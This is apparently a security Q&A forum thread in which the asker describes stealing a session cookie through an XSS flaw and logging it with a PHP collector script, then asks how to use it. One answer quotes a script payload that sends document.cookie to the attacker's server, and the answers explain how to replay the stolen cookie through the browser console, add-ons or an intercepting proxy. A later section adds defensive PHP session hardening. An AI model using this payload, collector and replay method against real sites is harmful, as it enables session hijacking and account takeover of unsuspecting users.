
How to use a stolen cookie? [Resolved]

I have taken advantage of an XSS vulnerability to steal a cookie by sending it as a variable in the URL to my PHP page. I think that is one of the normal processes.

This is the XSS payload:


And this is my PHP:

$cookie = $_GET['cookie'];

//open the file and choose the mode
$fh = fopen("users", "a");
fwrite($fh, $cookie);

//close the file
fclose($fh);

print "User Submitted: ";
print ($cookie);

Everything is well so far. But now that I have the cookie, how do I use it to get into the website I stole it from?


Question Credit: aDoN
Asked September 2, 2019
4 Answers

...php writes the cookie into a file. (I think that is one of the normal processes).

From what you wrote above, it seems that there could be some misconception in your understanding of how a session is created and maintained on a website. When a user logs in to a website, a session id is generated and this id is stored in a special cookie, known as the session cookie, on the client's browser, like this:

PHPSESSID:fgws4j52jcm10dkgw02nd2

At the same time, a session file (or database row) with the same id is created containing variables (such as user name, login time) related to that particular user. These session variables are stored server side and called from the superglobal $_SESSION array when a session is started.

To hijack a session, what you need is a cookie containing the name-value pair like the one above. One precondition is that the victim must be logged in during the attack such that the session file with the stolen id is still fresh on the server. Also, the website must not be doing other extraneous checks (such as user agent or IP address) to thwart hijackers.

<script>location.href = 'http://myserverIP/test/signup.php?cookie='+document.cookie;</script>

The JavaScript you wrote above merely injects a name-value pair in the superglobal $_GET array. What you want is to transmit the name-value pair using your browser cookie, certainly not with the URL.

Most modern browsers store the cookie information in a database such as sqlite. To edit a cookie, you need to access the web console or the developer toolbar which is covered here for Chrome and here for Firefox.


credit: Community
Answered September 2, 2019
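
The preconditions listed in the answer above (a session id that script can read, a session still fresh on the server, and no server-side checks on the client) map directly to server-side mitigations. The following is an added example, not code from the thread; the function names, the User-Agent binding and the 900-second idle limit are assumptions chosen for illustration.

```php
<?php
// Added example (not from the original thread): hardening a PHP session.
// Function names and the 900-second idle limit are illustrative assumptions.

// HttpOnly keeps PHPSESSID out of document.cookie; Secure keeps it off plain HTTP.
function harden_session_cookie(): void {
    session_set_cookie_params([
        'lifetime' => 0,      'path'     => '/',
        'secure'   => true,   'httponly' => true,
        'samesite' => 'Lax',
    ]);
}

// Secondary signal only: a hash of the User-Agent seen at login.
function client_fingerprint(array $server): string {
    return hash('sha256', $server['HTTP_USER_AGENT'] ?? '');
}

// Call right after authentication, following session_regenerate_id(true).
function bind_session(array &$session, array $server, string $user, int $now): void {
    $session = ['user' => $user, 'fp' => client_fingerprint($server), 'last_seen' => $now];
}

// Call on every request; on false, destroy the session and require a new login.
function session_is_valid(array &$session, array $server, int $now, int $idleLimit = 900): bool {
    if (!isset($session['user'], $session['fp'], $session['last_seen'])) {
        return false;                 // never bound, or tampered with
    }
    if ($now - $session['last_seen'] > $idleLimit) {
        return false;                 // session is no longer fresh
    }
    if (!hash_equals($session['fp'], client_fingerprint($server))) {
        return false;                 // same session id, different client
    }
    $session['last_seen'] = $now;     // sliding idle window
    return true;
}

// Constructed demo data, runnable from the CLI.
$store = [];
bind_session($store, ['HTTP_USER_AGENT' => 'Browser-A/1.0'], 'alice', 1000);
var_dump(session_is_valid($store, ['HTTP_USER_AGENT' => 'Browser-A/1.0'], 1100)); // owner's browser
var_dump(session_is_valid($store, ['HTTP_USER_AGENT' => 'Browser-B/2.0'], 1200)); // id replayed elsewhere
var_dump(session_is_valid($store, ['HTTP_USER_AGENT' => 'Browser-A/1.0'], 5000)); // after idle timeout
```

In a real request, call `harden_session_cookie()` before `session_start()` and pass `$_SESSION` and `$_SERVER` to the two session functions. The `httponly` flag is the primary control here; the fingerprint and idle timeout only narrow the window in which a copied session id is accepted.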

You can use JavaScript to set the cookie in your browser:

document.cookie =
 'cookie1=test; expires=Fri, 3 Aug 2022 20:47:11 UTC; path=/'

You just need to open a console by pressing F12 or place the JavaScript in a webpage.

See https://stackoverflow.com/questions/14573223/set-cookie-and-get-cookie-with-javascript


credit: Community
Answered September 2, 2019

There are different ways of actually doing it, all boiling down to the same thing:

  • Usually, your browser should allow you to modify a stored cookie value; just replace the current value with the one you've stolen
  • There are numerous browser add-ons and plugins that allow you to tamper with your request before sending it; you can add or modify your cookie value there
  • You can deploy a local proxy like Fiddler or Burp to basically do the same thing and tamper with your request before sending it

credit: Dillinur
Answered September 2, 2019